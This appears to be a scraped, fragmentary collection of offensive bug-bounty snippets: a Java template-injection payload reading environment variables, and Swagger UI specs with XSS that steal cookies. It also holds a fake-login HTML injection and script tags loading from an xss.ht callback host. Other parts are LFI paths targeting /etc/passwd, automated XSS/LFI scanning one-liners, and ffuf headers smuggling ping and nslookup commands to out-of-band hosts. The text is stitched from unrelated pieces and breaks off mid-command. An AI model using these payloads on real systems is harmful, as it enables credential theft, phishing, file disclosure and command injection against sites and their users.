Emad Shanab emadshanab

Typically java ssti payloads start with $. But if that character is banned you can use * instead of that.
Get env vars

*{T(java.lang.System).getenv()}

	swagger: '2.0'
	securityDefinitions:
	a:
	type: oauth2
	authorizationUrl: javascript:alert(document.domain)//
	info:
	version: "0.0.1"
	title: DOM XSS PoC
	description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">'
	termsOfService: "javascript:alert(document.cookie)"

	{
	"url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
	"urls": [
	{
	"url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
	"name": "Test"
	}
	]
	}

	swagger: '2.0'
	info:
	version: 1.0.0
	title: Fake Login Page
	description: '<div class="login-form">
	<div class="heading">
	<h1>HTML Injection : Fake Login</h1>
	</div>
	<div class="form-container">
	<form action="https://example.com/login" method="post" class="form-signin">

	import asyncio
	import aiohttp
	import time
	import sys
	import argparse
	import os

	parser = argparse.ArgumentParser(description='Directory Bruteforce')
	parser.add_argument('-u', '--url', help='URL to bruteforce', required=True)
	parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True)

	id: swagger-ui

	info:
	name: Swagger UI
	author: vidocsecurity
	severity: low
	description: Swagger UI exposes information about endpoints and sometimes it is vulnerable tu XSS
	tags: swagger-ui,exposure

	requests:

	"><script src=https://username.xss.ht></script>
	'><script src=https://username.xss.ht></script>
	";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')

	[
	"/ui/vropspluginui/rest/services/getstatus",
	"/ghost/preview",
	"/wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=cnss_social_icon_page",
	"/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
	"/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
	"/log_download.cgi?type=../../etc/passwd",
	"/templates/m/inc_head.php?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
	"/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
	"/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00",

	assetfinder https://exmple.com \| gau --subs \| egrep -v '(.css\|.svg)' \| while read url; do vars=$(curl -s $url \| grep -Eo "var [a-zA-Z0-9]+" \| sed -e 's,'var','"$url"?',g' -e 's/ //g' \| grep -v '.js' \| sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done

	assetfinder https://exmple.com \| gau --subs https://exmple.com \| gf lfi \| place "/etc/passwd" \| xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 \| grep -q "root:x" && echo "VULN! %"'

	gf lfi output/domains.txt \| place FUZZ \| while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done

	### DNS rebinding for RCE
	gf lfi output/*.txt \| place FUZZ \| while read url ; do ffuf -u $url -mr "root:x" -H